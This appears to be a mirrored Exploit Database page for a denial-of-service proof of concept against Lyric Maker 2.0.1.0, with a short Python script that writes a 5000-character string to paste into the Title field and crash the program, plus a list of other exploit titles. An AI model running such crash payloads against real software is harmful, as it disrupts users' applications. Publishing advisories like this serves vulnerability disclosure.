Lyric Maker 2.0.1.0 – Denial of Service (PoC)

Exploit Database
96 阅读

作者： Alejandra Sánchez

日期： 2019-05-09
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/46817/

# -*- coding: utf-8 -*-
# Exploit Title: Lyric Maker 2.0.1.0 - Denial of Service (PoC)
# Date: 08/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.jetaudio.com/
# Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe
# Version: 2.0.1.0
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "LyricMaker.py", it will create a new file "LyricMaker.txt"
# 2.- Copy the text from the generated LyricMaker.txt file to clipboard
# 3.- Open JetLyric.exe or Lyric Maker
# 4.- Paste clipboard in in the field "Title"
# 5.- Go to file -> Save Lyric...
# 6.- Save the file with any name, e.g 'sample.jlr'
# 7.- Crashed

buffer = "\x41" * 5000
f = open ("LyricMaker.txt", "w")
f.write(buffer)
f.close()

last Exploits
Lyric Maker 2.0.1.0 – Denial of Service (PoC)的更多信息

Wireshark – ‘AirPDcapDecryptWPABroadcastKey’ Heap Out-of-Bounds Read (2)：
Opera SVG – Use-After-Free：
Sync Breeze 10.2.12 – Denial of Service：
MASM32 11R – Crash (PoC)：
Mp3 Digitalbox 2.7.2.0 – ‘.mp3’ Local Stack Overflow (PoC)：
Ettercap 0.7.5.1 – Stack Overflow：
Core FTP Server FTP / SFTP Server v2 Build 674 – ‘SIZE’ Directory Traversal：
Apple macOS/iOS – Kernel Double Free due to IOSurfaceRootUserClient not Respecting MIG Ownership Rules：